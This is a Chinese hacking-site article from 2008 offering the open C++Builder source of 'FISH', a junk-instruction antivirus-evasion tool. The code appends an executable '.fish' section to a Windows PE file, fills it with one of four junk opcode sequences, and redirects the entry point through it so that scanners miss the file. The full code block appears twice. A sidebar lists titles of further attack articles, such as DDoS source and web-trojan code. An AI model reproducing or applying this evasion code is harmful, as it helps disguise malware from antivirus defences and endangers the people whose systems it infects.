以下是引用片段:
BYTE Me1[46]={
 0x6A,0xFA,0x6A,0x06,0x6A,0x06,0x64,0xA1,0x00,0x00,0x00,
 0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xEC,
 0x68,0x53,0x56,0x57,0x58,0x58,0x58,0x83,0xC4,0x68,0x58,
 0x64,0xA3,0x00,0x00,0x00,0x00,0x58,0x58,0x58,0x8B,0xE8,
 0x6A,0x00
 };

 BYTE Me2[46]={
 0x33,0xC0,0x33,0xC0,0x6A,0x00,0x64,0x89,0x25,0x00,0x00,
 0x00,0x00,0x90,0x90,0x90,0x90,0x90,0x83,0xE8,0x30,0x55,
 0x5D,0x83,0xC0,0x30,0x6A,0x00,0x6A,0x00,0x64,0xA3,0x00,
 0x00,0x00,0x00,0x64,0xFF,0x35,0x00,0x00,0x00,0x00,0x90,
 0x6A,0x00
 };

 BYTE Me3[23]={
 0x50,0x33,0xC9,0x5F,0x3B,0xC8,0x1B,0xC0,0xF7,0xD8,0x68,
 0x00,0x01,0x00,0x00,0x42,0x4A,0x6A,0x00,0x6A,0x02,0x33,
 0xC9
 };

 BYTE Me4[32]={
 0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x8B,0xEC,0x81,
 0xC4,0xDC,0xFE,0xFF,0xFF,0x89,0x85,0xDC,0xFE,0xFF,0xFF,
 0x90,0x8B,0x5D,0x08,0x56,0x8B,0x7D,0x10,0x85,0xF6
 };

 AnsiString NewFile=FileName+".bak";
 CopyFile(FileName.c_str(),NewFile.c_str(),FALSE); //备份文件
 DWORD Voffset=0,Vsize=0,MyOffset=0;
 //RVA偏移地址
 IMAGE_DOS_HEADER DosHeader;
 IMAGE_NT_HEADERS32 ExeHeader;
 int NumOfSections;
 FILE *fp;
 fp=fopen(FileName.c_str(),"rb+");
 fseek(fp,0,SEEK_SET);
 fread(&DosHeader,sizeof(DosHeader),1,fp);
 if (DosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
 {
 ShowMessage("不是有效的MZ文件");
 return ;
 }
 fseek(fp,DosHeader.e_lfanew,SEEK_SET);
 fread(&ExeHeader,sizeof(ExeHeader),1,fp);
 if (ExeHeader.Signature!=IMAGE_NT_SIGNATURE)
 {
 ShowMessage("不是有效的PE文件");
 return ;
 }
 
 int oep=ExeHeader.OptionalHeader.AddressOfEntryPoint; //保存oep.....
 int NumSection = ExeHeader.FileHeader.NumberOfSections; //获得节的数量
 fseek(fp,(DosHeader.e_lfanew+sizeof(ExeHeader.Signature)+sizeof(ExeHeader.FileHeader)+(Ex eHeader.FileHeader.SizeOfOptionalHeader)),SEEK_SET); //来到节表位置
 IMAGE_SECTION_HEADER OLD_SECTION;
 for (int i = 0; i < NumSection; i++)
 {
 fread(&OLD_SECTION,sizeof(IMAGE_SECTION_HEADER),1,fp);
 } //嘿嘿来到最后一个节表的位置,节表其实是一个数组成员,包含每个节的属性对应的偏移量等

 Voffset=OLD_SECTION.VirtualAddress;
 Vsize=OLD_SECTION.Misc.VirtualSize;
 while (MyOffset<Voffset+Vsize)//没有办法,只有求出最大的offset..
 {
 MyOffset+=0x1000;
 }
 IMAGE_SECTION_HEADER iMageNewSection;// 声明结构
memset(&iMageNewSection,0,sizeof(iMageNewSection)); //用0填充iMageNewSection结构
memcpy((char*)iMageNewSection.Name,".fish",strlen(".fish"));//给新节的名字赋值
iMageNewSection.VirtualAddress=MyOffset;//设置新节的RVA地址,也就是最后一个节表的最后位置
iMageNewSection.Misc.VirtualSize=0x1000; //设置节的长度
iMageNewSection.PointerToRawData=OLD_SECTION.PointerToRawData+OLD_SECTION.SizeOfRawData;//设置新节的文件偏移量
iMageNewSection.SizeOfRawData=0x200; //设置节的物理长度
iMageNewSection.Characteristics=0xE0000020;//设置节的属性
fseek(fp,DosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)+NumSection*sizeof(IMAGE_SECTION_HEADER),SEEK_SET); //来到新节的位置
fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,fp);//写入一个节

ExeHeader.FileHeader.NumberOfSections++;//增加一节
ExeHeader.OptionalHeader.SizeOfImage=iMageNewSection.VirtualAddress+0x1000;
 ExeHeader.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress+6; //修改OEP
 ExeHeader.OptionalHeader.MajorLinkerVersion=6;
 ExeHeader.OptionalHeader.MinorLinkerVersion=0;
 fseek(fp,DosHeader.e_lfanew,SEEK_SET); //来到PE头
 fwrite(&ExeHeader,sizeof(IMAGE_NT_HEADERS32),1,fp);//写入ExeHeader,使上面的操作生效
 fseek(fp,iMageNewSection.PointerToRawData,SEEK_SET);

 for (int i = 0; i <0x200; i++)
 {
 fputc(0,fp);
 }

 fseek(fp,iMageNewSection.PointerToRawData+6,SEEK_SET);
 if (RadioButton1->Checked==true) {
 fwrite(&Me1,sizeof(Me1),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me1))-11;
 fwrite(&newoep,4,1,fp);
 }

 if (RadioButton2->Checked==true) {
 fwrite(&Me2,sizeof(Me2),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me2))-11;
 fwrite(&newoep,4,1,fp);
 }
 if (RadioButton3->Checked==true) {
 fwrite(&Me3,sizeof(Me3),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me3))-11;
 fwrite(&newoep,4,1,fp);
 }

 if (RadioButton4->Checked==true) {
 fwrite(&Me4,sizeof(Me4),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me4))-11;
 fwrite(&newoep,4,1,fp);
 }
 fclose(fp);
 MessageBox(NULL,"加花指令完成,谢谢使用...by:Xfish","提示",MB_OK + MB_ICONEXCLAMATION);

源代码下载: Xfish.rar
">
黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客编程 >> 文章正文
[推荐]FISH花指令免杀器(开源代码)
        ★★★★★
FISH花指令免杀器(开源代码)
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-1-13
注:本软件首发黑客防线,后由原创作者友情提交到邪恶八进制信息安全团队讨论组。转载请注明原始出处黑客防线。

程序采用C++Builder 2007 编写,学了两天pe结构,写个花指令免杀器练手...因为小弟学习c++2个星期多,所以代码风格等写的不是很好,请包涵...感谢冷风师兄之前的帮助,也感谢之前一直帮助过我的人...希望此程序能给别人带来更好的思路..........
以下是引用片段:
BYTE Me1[46]={
 0x6A,0xFA,0x6A,0x06,0x6A,0x06,0x64,0xA1,0x00,0x00,0x00,
 0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xEC,
 0x68,0x53,0x56,0x57,0x58,0x58,0x58,0x83,0xC4,0x68,0x58,
 0x64,0xA3,0x00,0x00,0x00,0x00,0x58,0x58,0x58,0x8B,0xE8,
 0x6A,0x00
 };

 BYTE Me2[46]={
 0x33,0xC0,0x33,0xC0,0x6A,0x00,0x64,0x89,0x25,0x00,0x00,
 0x00,0x00,0x90,0x90,0x90,0x90,0x90,0x83,0xE8,0x30,0x55,
 0x5D,0x83,0xC0,0x30,0x6A,0x00,0x6A,0x00,0x64,0xA3,0x00,
 0x00,0x00,0x00,0x64,0xFF,0x35,0x00,0x00,0x00,0x00,0x90,
 0x6A,0x00
 };

 BYTE Me3[23]={
 0x50,0x33,0xC9,0x5F,0x3B,0xC8,0x1B,0xC0,0xF7,0xD8,0x68,
 0x00,0x01,0x00,0x00,0x42,0x4A,0x6A,0x00,0x6A,0x02,0x33,
 0xC9
 };

 BYTE Me4[32]={
 0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x8B,0xEC,0x81,
 0xC4,0xDC,0xFE,0xFF,0xFF,0x89,0x85,0xDC,0xFE,0xFF,0xFF,
 0x90,0x8B,0x5D,0x08,0x56,0x8B,0x7D,0x10,0x85,0xF6
 };

 AnsiString NewFile=FileName+".bak";
 CopyFile(FileName.c_str(),NewFile.c_str(),FALSE); //备份文件
 DWORD Voffset=0,Vsize=0,MyOffset=0;
 //RVA偏移地址
 IMAGE_DOS_HEADER DosHeader;
 IMAGE_NT_HEADERS32 ExeHeader;
 int NumOfSections;
 FILE *fp;
 fp=fopen(FileName.c_str(),"rb+");
 fseek(fp,0,SEEK_SET);
 fread(&DosHeader,sizeof(DosHeader),1,fp);
 if (DosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
 {
 ShowMessage("不是有效的MZ文件");
 return ;
 }
 fseek(fp,DosHeader.e_lfanew,SEEK_SET);
 fread(&ExeHeader,sizeof(ExeHeader),1,fp);
 if (ExeHeader.Signature!=IMAGE_NT_SIGNATURE)
 {
 ShowMessage("不是有效的PE文件");
 return ;
 }
 
 int oep=ExeHeader.OptionalHeader.AddressOfEntryPoint; //保存oep.....
 int NumSection = ExeHeader.FileHeader.NumberOfSections; //获得节的数量
 fseek(fp,(DosHeader.e_lfanew+sizeof(ExeHeader.Signature)+sizeof(ExeHeader.FileHeader)+(Ex eHeader.FileHeader.SizeOfOptionalHeader)),SEEK_SET); //来到节表位置
 IMAGE_SECTION_HEADER OLD_SECTION;
 for (int i = 0; i < NumSection; i++)
 {
 fread(&OLD_SECTION,sizeof(IMAGE_SECTION_HEADER),1,fp);
 } //嘿嘿来到最后一个节表的位置,节表其实是一个数组成员,包含每个节的属性对应的偏移量等

 Voffset=OLD_SECTION.VirtualAddress;
 Vsize=OLD_SECTION.Misc.VirtualSize;
 while (MyOffset<Voffset+Vsize)//没有办法,只有求出最大的offset..
 {
 MyOffset+=0x1000;
 }
 IMAGE_SECTION_HEADER iMageNewSection;// 声明结构
memset(&iMageNewSection,0,sizeof(iMageNewSection)); //用0填充iMageNewSection结构
memcpy((char*)iMageNewSection.Name,".fish",strlen(".fish"));//给新节的名字赋值
iMageNewSection.VirtualAddress=MyOffset;//设置新节的RVA地址,也就是最后一个节表的最后位置
iMageNewSection.Misc.VirtualSize=0x1000; //设置节的长度
iMageNewSection.PointerToRawData=OLD_SECTION.PointerToRawData+OLD_SECTION.SizeOfRawData;//设置新节的文件偏移量
iMageNewSection.SizeOfRawData=0x200; //设置节的物理长度
iMageNewSection.Characteristics=0xE0000020;//设置节的属性
fseek(fp,DosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)+NumSection*sizeof(IMAGE_SECTION_HEADER),SEEK_SET); //来到新节的位置
fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,fp);//写入一个节

ExeHeader.FileHeader.NumberOfSections++;//增加一节
ExeHeader.OptionalHeader.SizeOfImage=iMageNewSection.VirtualAddress+0x1000;
 ExeHeader.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress+6; //修改OEP
 ExeHeader.OptionalHeader.MajorLinkerVersion=6;
 ExeHeader.OptionalHeader.MinorLinkerVersion=0;
 fseek(fp,DosHeader.e_lfanew,SEEK_SET); //来到PE头
 fwrite(&ExeHeader,sizeof(IMAGE_NT_HEADERS32),1,fp);//写入ExeHeader,使上面的操作生效
 fseek(fp,iMageNewSection.PointerToRawData,SEEK_SET);

 for (int i = 0; i <0x200; i++)
 {
 fputc(0,fp);
 }

 fseek(fp,iMageNewSection.PointerToRawData+6,SEEK_SET);
 if (RadioButton1->Checked==true) {
 fwrite(&Me1,sizeof(Me1),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me1))-11;
 fwrite(&newoep,4,1,fp);
 }

 if (RadioButton2->Checked==true) {
 fwrite(&Me2,sizeof(Me2),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me2))-11;
 fwrite(&newoep,4,1,fp);
 }
 if (RadioButton3->Checked==true) {
 fwrite(&Me3,sizeof(Me3),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me3))-11;
 fwrite(&newoep,4,1,fp);
 }

 if (RadioButton4->Checked==true) {
 fwrite(&Me4,sizeof(Me4),1,fp);
 BYTE jmp=0xE9;
 fwrite(&jmp,sizeof(jmp),1,fp);
 DWORD newoep=oep-(iMageNewSection.VirtualAddress+sizeof(Me4))-11;
 fwrite(&newoep,4,1,fp);
 }
 fclose(fp);
 MessageBox(NULL,"加花指令完成,谢谢使用...by:Xfish","提示",MB_OK + MB_ICONEXCLAMATION);

源代码下载: Xfish.rar
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    利用BCB自己打造QQ炸弹10-23
    从内存中加载并启动一个exe(delp09-27
    开启和关闭Windows xp 防火墙(de09-27
    让你的程序通过XP防火墙(delphi编09-27
    如何让你的程序安全通过windows防08-20
    如何透过程序来控制 Windows (XP08-20
    动易2005-2006算号器的源代码08-11
    一段隐藏注册表项的代码07-26
    了解VB编写病毒的大体方法07-02
    每秒4W的DDOS源码06-08
    从内存中加载并启动一个exe(Delp06-05
    判断当前用户是否为管理员(Delph06-05
    相 关 文 章
  • Winlogon劫持记录3389密码小工具(开源代

  • 阻止Alert攻击代码

  • 真正能用,还有点效果的CSS挂马代码

  • 强制设为首页的脚本代码

  • php代码不开源下的一种漏洞检测思路

  • 就算不是黄钻照样漂亮QQ空间免费物品名

  • 免费使用QQ空间绿钻音乐代码

  • 一段有注射漏洞的asp代码

  • 一段隐藏注册表项的代码

  • Windows 死机代码解析

  • 寻找最短的跨站代码

  • 各种网页木马挂马的代码

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886